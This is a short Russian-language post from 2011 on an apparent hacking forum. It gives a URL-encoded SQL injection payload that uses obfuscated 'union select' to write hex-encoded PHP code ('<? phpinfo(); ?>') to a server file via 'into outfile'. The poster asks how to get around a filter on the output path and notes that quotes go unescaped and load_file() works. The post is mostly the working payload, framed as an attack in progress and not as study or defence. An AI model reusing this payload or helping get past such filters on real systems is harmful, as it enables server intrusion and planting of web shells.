Показать сообщение отдельно

  #7  
Старый 06.07.2011, 20:35
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами: 10095779

Репутация: 137
По умолчанию

есть запрос на заливку такого типа:

+%75nion+%73elect+1,2,0x3c3f20706870696e666f28293b 203f3e,4,5,6,7+%69nto+%6futfile+'/tmp/1.txt'+--+

там где /tmp/1.txt фильтруется, что сдесь можно придумать?

кавычки не фильтруются и не экранируются, load_file() так же работает нормально.
 
Ответить с цитированием